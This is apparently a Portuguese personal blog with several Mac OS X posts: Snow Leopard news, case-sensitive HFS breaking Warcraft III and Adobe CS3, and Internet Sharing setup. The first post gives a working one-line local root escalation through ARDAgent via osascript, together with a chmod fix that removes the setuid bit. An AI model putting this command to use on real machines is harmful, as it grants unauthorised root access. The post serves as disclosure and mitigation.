Ownando um MAC OS X Leopard com um comando

Dizem que o OSX é mais seguro que a concorrência, acho que não 🙂 Abra um terminal e digite :

osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Isso mesmo, troque o whoami por qualquer outro comando e execute como root .

Agora vamos resolver o problema e eliminar a ameaça :

sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent

Mas não vale Reparar as permissões , ou ele volta com a falha de segurança !!!

Snow Leopard

A apple anunciou o Snow Leopard , aka: MAC OSX 10.6. O sistema aparentemente será robusto, vai trazer a tecnologias novas como OpenCL , que permite usar a GPU como co-processador, ZFS etc… Ele vai suportar também o Microsoft Exchange, multiplos processadores, sistema totalmente 64bits etc…

Mas o Jobs deu uma dica boa… Ao anunciar o novo sistema disse que ele terá binários menores, menor consumo de memória, ou seja, seria o fim dos binários universais ? Acho que sim, olha só o que chegou pros developers:


noppc

É a pá de cal nos macs PPC 🙁

Mac OS X pisa na bola

Eu sou um entusiasta do sistema da apple , e o Leopard me deixou tão satisfeito que não tive coragem até agora de particionar o HD do meu macbook pro pra instalar linux. O sistema praticamente não da trabalho, um update aqui e ali, raros
travamentos, desempenho razoavel (linux assasina o OSX quando o assunto é desempenho e bateria), mas quando resolve me pentelhar faz bem feito.


Já formatei meu notebook 3 vezes, uma quando comprei, outra quando notei que após 3 migrações de notebooks estavam fazendo mal ao meu sistema ( do ibook pro powerbook e agora pro macbook), e agora por problemas com Utter Crap HFS .

Quando fiz o segundo format eu notei que meu sistema antigo estava configurado para ser Case-Insensitive, ou seja “Isso==iSSo”. Como minha escola é Unix pra mim nada mais natural do que usar um sistema Case-Sensitive onde “iSSo é diferende de IssO”, pena que os desenvolvedores de software pra plataforma não sabem disso. Logo após restaurar minhas tralhas do backup notei que meu Warcraft III – TFT não tava mais rolando, reclamava de arquivos faltando, fui corrigindo o case dos nomes dos arquivos um por um, e quando notei que eram centenas, fiz um script mas foi inútil pois a Engine do jogo não segue um padrão ao chamar os arquivos…. A minha solução foi criar uma imagem de disco Case- Insensitive e botar o game dentro. Deu certo, e a vida continuou.

Nas crises da vida, notei que se eu quiser ter um futuro conjulgal terei que lidar menos com a máquina e mais com sentimentos, emoções e arte. Então decidi voltar a desenhar e tentar a sorte profissionalmente no médio prazo… Então nada mais natural do que dominar as ferramentas básicas padrão do mercado. Domino bem o Gimp e o Inkscape, e sei que eles tem limites, mas nunca instalei um illustrator ou photoshop na vida e sei que eles tem virtudes. Após um interminavel download do site da Adobe quando fui instalar a versão Trial do Flash :

cs3error

 

Pra não cair no problema do Warcraft a Adobe simplesmente limou o suporte ao HFS Case-sensitive, pensei comigo que seria possível usar a mesma estratégia do Warcraft, criando uma imagem de disco e jogando tudo dentro… Errei ! Tive que reformatar meu HD usando Case Insensitive pra evitar futuros problemas. O problema não tem outra solução, e segundou alguns MacAcos velhos que conheço esse tipo de incompatibilidade sempre rolou.

É como eu disse, quase não da trabalho, mas quando da normalmente é perda total 😛

Compartilhando wifi com Leopard

Ok, parece ridículo, mas levei 2 horas pra descobrir que compartilhar rede usando o Leopard é ridículamente simples, mais fácil que no Tiger. Então vamos lá :
System Prefs > Sharing > Internet Sharing, escolha o wifi como fonte de internet, e marque os dispositivos que serão beneficiados com a rede, ou seja, firewire, ethernet, bluetooh etc…
Apó essa configuração as máquinas clientes devem ser configuradas pegar o IP por DHCP.

Eu demorei tudo isso, simplesmente porque no linux além de usar os comandinhos básicos normalmente os ips do cliente são criados estaticamente, ou seja, eu estava configurando os clientes para uma rede que não existia…. Só depois vi que o Leopard cria automaticamente os aliases nos devices e de quebra levanda um mini-dhcp server para os clientes…